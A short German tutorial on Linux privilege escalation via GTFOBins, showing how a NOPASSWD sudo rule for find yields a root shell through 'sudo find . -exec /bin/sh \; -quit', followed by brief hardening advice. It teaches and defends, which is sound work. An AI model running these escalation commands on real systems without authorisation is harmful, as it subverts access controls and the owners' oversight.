Linux mit GTFOBins

Hintergrund: Was ist GTFOBins?

GTFOBins ("Get The Fuck Out Binaries") ist eine kuratierte Liste legitimer Unix-Binaries, die bei falscher Konfiguration zur Privilege Escalation, File Read/Write, Shell Access oder Exfiltration missbraucht werden können.

Website: https://gtfobins.github.io

Besonders relevant, wenn ein Benutzer über sudo bestimmte Programme ausführen darf – aber ohne vollständige Root-Rechte.

---

Schritt 1: Berechtigungen prüfen

sudo -l

Beispielausgabe:

User john may run the following commands on base:
    (ALL) NOPASSWD: /usr/bin/find

→ Benutzer john darf find mit Root-Rechten ausführen.

---

Schritt 2: Passende Binary bei GTFOBins suchen

Suche auf gtfobins.github.io nach "find" und prüfe den Sudo-Abschnitt:

sudo find . -exec /bin/sh \; -quit

---

Erklärung des Befehls

find .                # sucht im aktuellen Verzeichnis
-exec /bin/sh \;     # führt /bin/sh aus (über -exec)
-quit                 # beendet die Suche nach erstem Match

Wirkung: Da find mit sudo läuft, wird sh ebenfalls als root ausgeführt → Root-Shell

Hinweis: Statt /bin/sh kann /bin/bash verwendet werden, wenn verfügbar:

sudo find . -exec /bin/bash \; -quit

---

Wann ist das relevant?

• Wenn sudo -l Ausgaben wie (ALL) NOPASSWD: /usr/bin/<BINARY> zeigt

• Wenn das Binary laut GTFOBins Shell-Ausführung oder Dateizugriff erlaubt

• Wenn keine Passwortabfrage erforderlich ist (NOPASSWD:)

---

Schutzmaßnahmen

• sudo nur für genau definierte, sichere Binaries verwenden

• NOPASSWD nur in gut kontrollierten Umgebungen einsetzen

• Binaries wie find, less, awk, vim etc. vermeiden, wenn nicht unbedingt notwendig

---

Weitere Quellen:

• GTFOBins – find

• GTFOBins – Übersicht

• LOLBAS für Windows (Äquivalent)